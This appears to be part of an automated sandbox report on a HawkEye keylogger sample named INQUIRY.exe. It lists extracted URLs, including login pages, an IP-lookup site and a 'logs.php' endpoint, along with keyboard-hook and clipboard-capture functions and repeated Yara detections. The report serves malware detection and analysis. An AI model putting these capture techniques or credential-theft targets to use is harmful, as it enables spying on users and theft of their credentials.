                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: INQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                    Source: INQUIRY.exe, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: INQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com$p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com0p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMic
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC(
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCE
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comandh
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comits
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comle
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comsm
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comtig
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: INQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: INQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: INQUIRY.exe, 00000001.00000003.662998950.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                    Source: INQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designershq
                    Source: INQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerslb
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comTTFF
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd=
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comepko
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc.
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coms
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv&
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Treb
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cheV
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
                    Source: INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                    Source: vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected HawkEye Keylogger
                    Source: Yara match, File source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara match, File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara match, File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara match, File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, .Net Code: HookKeyboard
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_004070D2 OpenClipboard,0_2_004070D2
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_004233B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_004233B4
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 2_2_004239F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,2_2_004239F8
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00459724 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,0_2_00459724
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Window created: window name: CLIPBRDWNDCLASS

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
